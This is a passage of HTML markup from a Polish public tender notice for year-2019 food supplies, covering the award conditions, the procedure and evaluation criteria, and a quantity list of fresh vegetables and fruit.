black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03200000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15100000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15110000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15131500-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15331100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15229000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15830000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15610000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15872400-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15320000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15811000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15511000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2019-01-02</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-01-02 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 I 3 do SIWZAktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow">Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 do SIWZ</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 do SIWZ</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>TERMIN PŁATNOŚCI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">DOPUSZCZALNE ZMIANY POSTANOWIEŃ UMOWY ORAZ OKREŚLENIE WARUNKÓW ZMIAN ZGODNIE Z ZAPISAMI UMOWY STANOWIĄCEJ ZAŁĄCZNIK NR 4 DO SIWZ</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-11-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>WARZYWA I OWOCE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>WARZYWA ŚWIEŻE, OWOCE Banany kg 1300 Arbuz (odVI-IX) kg 150 Brukselka świeża (IX) kg 40 Brzoskwinie (od V-IX) kg 300 Buraki kg 800 Brokuły szt 160 bazylia doniczka szt 30 Borówki op 0,5 kg (VII, VIII) szt 5 Cebula kg 850 Cukinia kg 45 Cytryna kg 160 Czosnek siatka szt 50 Fasolka szparagowa żółta (IX) kg 35 Jabłka kg 1500 Gruszka kg 440 Kalafior świeży szt 250 Kalarepa szt 140 Kapusta biała (od I-IV i IX-XII) kg 1200 Kapusta włoska szt 150 Kapusta czerwona kg 475 Kiwi pakowane pojedyńczo szt 1750 koperek świeży PĘCZKI 1900 Kapusta pekińska -główka główka 120 Lubczyk doniczka szt 30 Marchew korzeń kg 1140 Mandarynki kg 75 Mięta doniczka szt 30 nektarynka (od V-IX) kg 130 Oregano doniczka szt 15 Ogórki zielone świeże (VII, VIII, IX) kg 140 Papryka czerwona świeża( I-VI, X-XII) kg 100 Papryka żółta świeża kg 15Rukola liście op 100g szt 10 Pieczarki świeże kg 220 Pietruszka korzeń kg 650 Pomidory (od I-VI i od X do XII) kg 240 pomarańcza kg 130 Por kg 500 Rabarbar - m-c lipiec, sierpień kg 5 Rzodkiewka pęczek 140 Rozmaryn doniczka szt 25 Sałata zielona główka 130 sałata lodowa główka 30 Seler korzeń kg 930 Seler naciowy 0,5 kg szt 10 Szczypiorek świeży pęczek 325 Tymianek doniczka szt 10 Truskawki - m-c czerwiec, lipiec kg 5 Winogrono kg 7 Zielona pietruszka świeża pęczek pęczek 1600 Ziemniaki jadalne kg 15000 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>MIĘSO I PRZETWORY</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>MIĘSO I 